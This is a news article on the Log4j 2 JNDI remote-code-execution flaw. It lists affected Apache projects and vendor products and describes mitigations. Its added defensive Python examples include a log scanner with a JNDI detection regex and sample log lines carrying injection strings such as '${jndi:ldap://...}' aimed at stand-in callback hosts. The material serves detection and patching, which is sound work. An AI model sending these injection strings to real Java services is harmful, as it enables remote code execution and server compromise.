Up to 17 Apache projects are affected by the Log4j 2 vulnerability

In recent days the Log4j vulnerability has been widely discussed on the net. Various attack vectors have been discovered for it, and various working exploits have been prepared to take advantage of the vulnerability.

The seriousness of the matter is that this is a popular framework for organizing logging in Java applications, and it allows arbitrary code to be executed when a specially formatted value in the format "{jndi: URL}" is written to the log. The attack can be carried out against Java applications that log values obtained from external sources, for example by displaying problematic values in error messages.

That is, the attacker makes an HTTP request to the target system, which generates a log entry using Log4j 2, which in turn uses JNDI to make a request to the site controlled by the attacker. The vulnerability then causes the exploited process to reach that site and execute the payload. In many of the attacks observed, the parameter that belongs to the attacker is a DNS logging system, intended to record a request on the site in order to identify vulnerable systems.
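A defender can look for the request described above in web-server logs. The following is an added example, not part of the original article: it scans access-log lines for the plain JNDI lookup form and extracts the callback host so it can be cross-checked against DNS and egress logs. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the plain Log4j 2 JNDI lookup: ${jndi:<scheme>://<host>...}
# Only the literal form is covered; other encodings need separate rules.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)",
    re.IGNORECASE,
)

def find_jndi_lookups(log_lines):
    """Return (line_no, scheme, host) for every JNDI lookup in the lines."""
    hits = []
    for line_no, raw in enumerate(log_lines, start=1):
        # Request fields may be percent-encoded once or twice; decode first.
        decoded = unquote(unquote(raw))
        for m in JNDI_LOOKUP.finditer(decoded):
            hits.append((line_no, m.group("scheme").lower(), m.group("host").lower()))
    return hits

def callback_hosts(hits):
    """Unique callback hosts, for comparison with DNS and egress logs."""
    return sorted({host for _, _, host in hits})

# Constructed sample lines (documentation IP ranges, reserved .example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:01:25 +0000] "GET /search?q=test HTTP/1.1" '
    '200 128 "-" "${jndi:ldap://probe1.collector.example/a}"',
    '198.51.100.4 - - [12/Dec/2021:10:02:03 +0000] "GET /?x=%24%7Bjndi%3Adns'
    '%3A%2F%2Fprobe2.collector.example%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG)
    for line_no, scheme, host in found:
        print(f"line {line_no}: jndi lookup via {scheme} to {host}")
    print("hosts to check in DNS/egress logs:", callback_hosts(found))
```

A hit only shows that the string reached the server; a matching outbound DNS or LDAP connection to the extracted host is what indicates the lookup was actually evaluated.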

As our colleague Isaac already shared:

The Log4j vulnerability allows exploitation of improper input validation for LDAP, which allows remote code execution (RCE) and compromise of the server (confidentiality, data integrity and system availability). In addition, the problem or importance of this vulnerability lies in the number of applications and servers that use it, including business software and cloud services such as Apple iCloud, Steam, or popular video games such as Minecraft: Java Edition, Twitter, Cloudflare, Tencent, ElasticSearch, Redis, Elastic Logstash, and a long etc.

Speaking of which, the Apache Software Foundation recently published, through a post, a summary of the projects that address the critical vulnerability in Log4j 2 that allows arbitrary code to run on the server.

The following Apache projects are affected: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl, and Calcite Avatica. The vulnerability also affected GitHub products, including GitHub.com, GitHub Enterprise Cloud, and GitHub Enterprise Server.

In recent days there has been a significant increase in activity related to exploitation of the vulnerability. For example, Check Point logged about 100 exploit attempts per minute on its decoy servers at its peak, and Sophos announced the discovery of a new cryptocurrency mining botnet, formed from systems with an unpatched vulnerability in Log4j 2.

Regarding the information that has been released about the problem:

  • The vulnerability has been confirmed in many official Docker images, including couchbase, elasticsearch, flink, solr, storm images, etc.
  • The vulnerability is present in the MongoDB Atlas Search product.
  • The problem appears in a variety of Cisco products, including Cisco Webex Meetings Server, Cisco CX Cloud Agent, Cisco Advanced Web Security Reporting, Cisco Firepower Threat Defense (FTD), Cisco Identity Services Engine (ISE), Cisco CloudCenter, Cisco DNA Center, Cisco BroadWorks, etc.
  • The problem exists in IBM WebSphere Application Server and in the following Red Hat products: OpenShift, OpenShift Logging, OpenStack Platform, Integration Camel, CodeReady Studio, Data Grid, Fuse, and AMQ Streams.
  • Confirmed issue in Junos Space Network Management Platform, Northstar Controller / Planner, Paragon Insights / Pathfinder / Planner.
  • Many products from Oracle, vmWare, Broadcom, and Amazon are also affected.

Apache projects that are not affected by the Log4j 2 vulnerability: Apache Iceberg, Guacamole, Hadoop, Log4Net, Spark, Tomcat, ZooKeeper, and CloudStack.

Users of the problematic packages are advised to urgently install the updates released for them, to update the Log4j 2 version separately, or to set the log4j2.formatMsgNoLookups parameter to true (for example, by adding the "-Dlog4j2.formatMsgNoLookups=true" key at startup).

To block the vulnerability on systems that cannot be accessed directly, it has been suggested to use the Logout4Shell vaccine, which, by carrying out an attack, sets the Java settings "log4j2.formatMsgNoLookups = true", "com.sun.jndi.rmi.object.trustURLCodebase = false" and "com.sun.jndi.cosnaming.object.trustURLCodebase = false" to block further manifestations of the vulnerability on uncontrolled systems.
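To verify that a JVM was actually started with the settings named above, the following added example (not from the original article or from Logout4Shell) parses a java command line and reports every setting that is missing or has the wrong value. The function names and sample command lines are constructed; only a few common JVM options that take a separate argument are handled.

```python
import shlex

# Settings named in the article, with the value each one must have.
REQUIRED = {
    "log4j2.formatMsgNoLookups": "true",
    "com.sun.jndi.rmi.object.trustURLCodebase": "false",
    "com.sun.jndi.cosnaming.object.trustURLCodebase": "false",
}
# JVM options whose value is the next token (simplified list, an assumption).
TAKES_ARG = ("-cp", "-classpath", "--class-path", "--module-path", "-p")

def jvm_options(cmdline):
    """JVM options of a java command line, stopping at -jar or the main class."""
    tokens = shlex.split(cmdline)[1:]      # drop the java executable itself
    opts, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-jar" or not tok.startswith("-"):
            break                          # everything after is application args
        if tok in TAKES_ARG:
            i += 1                         # skip the option's own argument
        else:
            opts.append(tok)
        i += 1
    return opts

def audit(cmdline):
    """Map each unmet required setting to the value found (None if not set)."""
    props = {}
    for tok in jvm_options(cmdline):
        if tok.startswith("-D") and "=" in tok:
            key, value = tok[2:].split("=", 1)
            props[key] = value             # a repeated flag keeps its last value
    return {key: props.get(key) for key, want in REQUIRED.items()
            if (props.get(key) or "").lower() != want}

# Constructed sample command lines.
HARDENED = ("java -Dlog4j2.formatMsgNoLookups=true "
            "-Dcom.sun.jndi.rmi.object.trustURLCodebase=false "
            "-Dcom.sun.jndi.cosnaming.object.trustURLCodebase=false -jar app.jar")
# Flag placed after the main class: it is an application argument, not a JVM option.
MISPLACED = ('java -cp "lib/*" -Dlog4j2.formatMsgNoLookups=true com.example.Main '
             "-Dcom.sun.jndi.rmi.object.trustURLCodebase=false")
# Misspelled key (missing final "s"): a different property, so nothing is set.
MISSPELLED = "java -Dlog4j2.formatMsgNoLookup=true -jar app.jar"

if __name__ == "__main__":
    for name, cmd in (("hardened", HARDENED), ("misplaced", MISPLACED),
                      ("misspelled", MISSPELLED)):
        print(name, "->", audit(cmd) or "all required settings present")
```

On a live Linux host the command line of a running JVM can be read from /proc/<pid>/cmdline (NUL-separated) and passed to audit() after joining the arguments.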

